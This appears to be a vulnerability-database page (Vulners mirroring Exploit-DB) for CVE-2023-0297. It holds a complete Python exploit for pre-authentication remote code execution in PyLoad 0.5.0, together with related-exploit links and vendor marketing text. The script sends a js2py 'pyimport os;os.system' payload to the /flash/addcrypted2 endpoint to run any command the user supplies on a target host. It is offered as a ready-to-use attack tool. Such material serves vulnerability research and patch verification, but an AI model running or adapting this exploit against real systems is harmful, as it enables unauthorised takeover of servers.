Lucene search
K

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

πŸ—“οΈΒ 14 Jun 2023Β 00:00:00Reported byΒ Gabriel LimaTypeΒ 
exploitdb
Β exploitdb
πŸ”—Β www.exploit-db.comπŸ‘Β 310Β Views

PyLoad 0.5.0 pre-auth RCE, CVE-2023-0297, Ubuntu 20.04.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Code Injection in Pyload
9 Jan 202311:44
–githubexploit
GithubExploit
Exploit for Code Injection in Pyload
21 May 202317:09
–githubexploit
GithubExploit
Exploit for Code Injection in Pyload
15 Jun 202314:28
–githubexploit
GithubExploit
Exploit for Code Injection in Pyload
15 Feb 202306:28
–githubexploit
GithubExploit
Exploit for Code Injection in Pyload
4 Oct 202412:03
–githubexploit
0day.today
pyLoad js2py Python Execution Exploit
27 Feb 202300:00
–zdt
0day.today
PyLoad 0.5.0 - Pre-auth Remote Code Execution Exploit
17 Jun 202300:00
–zdt
Huntr
Pre-auth RCE
1 Jan 202315:02
–huntr
Information Security Automation
Vulristics News: EPSS v3 Support, Integration into Cloud Advisor
23 Apr 202323:11
–avleonov
Circl
CVE-2023-0297
17 Jan 202310:44
–circl
Rows per page
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz 
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297

import requests, argparse

parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()

def doRequest(url):
    try:
        res = requests.get(url + '/flash/addcrypted2')
        if res.status_code == 200:
            return True
        else:
            return False

    except requests.exceptions.RequestException as e:
        print("[!] Maybe the host is offline :", e)
        exit()

def runExploit(url, cmd):
    endpoint = url + '/flash/addcrypted2'
    if " " in cmd:
        validCommand = cmd.replace(" ", "%20")
    else:
        validCommand = cmd

    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
    print('[+] The exploit has be executeded in target machine. ')

def main(targetUrl, Command):
    print('[+] Check if target host is alive: ' + targetUrl)
    alive = doRequest(targetUrl)
    if alive == True:
        print("[+] Host up, let's exploit! ")
        runExploit(targetUrl,Command)
    else:
        print('[-] Host down! ')

if(arguments.url != None and arguments.cmd != None):
    targetUrl = arguments.url
    Command = arguments.cmd
    main(targetUrl, Command)

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation